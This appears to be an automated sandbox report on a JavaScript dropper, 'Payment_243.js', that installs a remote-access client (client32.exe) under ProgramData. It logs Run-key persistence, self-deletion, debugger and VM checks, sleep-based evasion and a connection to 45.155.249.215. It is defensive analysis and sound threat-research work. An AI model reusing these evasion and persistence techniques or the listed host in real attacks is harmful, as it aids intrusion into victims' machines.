                                Source: C:\Windows\System32\wscript.exeSection loaded: devrtl.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: wow64win.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: wow64cpu.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: wbemcomn2.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: bcrypt.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: rpcrtremote.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: ntdsapi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: webio.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile written: C:\ProgramData\i99ekubc\NSM.iniJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Payment_243.jsStatic file information: File size 5736023 > 1048576
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\PROGRA~3\i99ekubc\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000004.00000002.644430314.0000000069DB1000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.644485160.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.644466466.0000000072B45000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: webmvorbisencoder.dll.0.drStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1116FF15 push ecx; ret 4_2_1116FF28
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1116AE09 push ecx; ret 4_2_1116AE1C
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D16BBF push ecx; ret 4_2_69D16BD2
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\webmmux.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\client32.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\webmvorbisencoder.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\webmmux.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\client32.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\webmvorbisencoder.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CF7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,4_2_69CF7030
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                                Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Deletes itself after installation
                                Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\payment_243.jsJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139ED0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C1020
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11113380 IsIconic,GetTickCount,4_2_11113380
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_11025A90
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113FA0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11025EE0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115BEE0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_110241A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024880
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CE91F04_2_69CE91F0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CF4F304_2_69CF4F30
                                Delayed program exit found
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110B86C0 Sleep,ExitProcess,4_2_110B86C0
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeWindow / User API: threadDelayed 392Jump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeWindow / User API: threadDelayed 8080Jump to behavior
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\i99ekubc\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\i99ekubc\webmmux.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\i99ekubc\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\i99ekubc\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\i99ekubc\webmvorbisencoder.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\ProgramData\i99ekubc\client32.exeEvaded block: after key decisiongraph_4-93421
                                Source: C:\ProgramData\i99ekubc\client32.exeEvaded block: after key decisiongraph_4-93819
                                Source: C:\ProgramData\i99ekubc\client32.exeEvaded block: after key decisiongraph_4-94263
                                Source: C:\ProgramData\i99ekubc\client32.exeEvaded block: after key decisiongraph_4-94498
                                Source: C:\ProgramData\i99ekubc\client32.exeEvaded block: after key decisiongraph_4-95191
                                Source: C:\ProgramData\i99ekubc\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-93560
                                Source: C:\ProgramData\i99ekubc\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-88724
                                Source: C:\ProgramData\i99ekubc\client32.exeAPI coverage: 6.6 %
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CF4F304_2_69CF4F30
                                Source: C:\Windows\System32\wscript.exe TID: 3664Thread sleep time: -300000s >= -30000sJump to behavior
                                Source: C:\Windows\System32\wscript.exe TID: 3800Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 3988Thread sleep time: -68500s >= -30000sJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 3992Thread sleep time: -39200s >= -30000sJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 4020Thread sleep time: -360000s >= -30000sJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 3988Thread sleep time: -2020000s >= -30000sJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\ProgramData\i99ekubc\client32.exeLast function: Thread delayed
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CF3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 69CF3226h4_2_69CF3130
                                Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: C:\ProgramData\i99ekubc\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-88627
                                Source: C:\ProgramData\i99ekubc\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-88589
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,4_2_110B7F30
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_1117D104
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_110934A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_11031780
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116EC49
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D028E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_69D028E1

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Benign windows process drops PE files
                                Source: C:\Windows\System32\wscript.exeFile created: webmvorbisencoder.dll.0.drJump to dropped file
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.155.249.215 80Jump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4990
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\i99ekubc\client32.exe "C:\ProgramData\i99ekubc\client32.exe" Jump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeFile opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dllJump to behavior
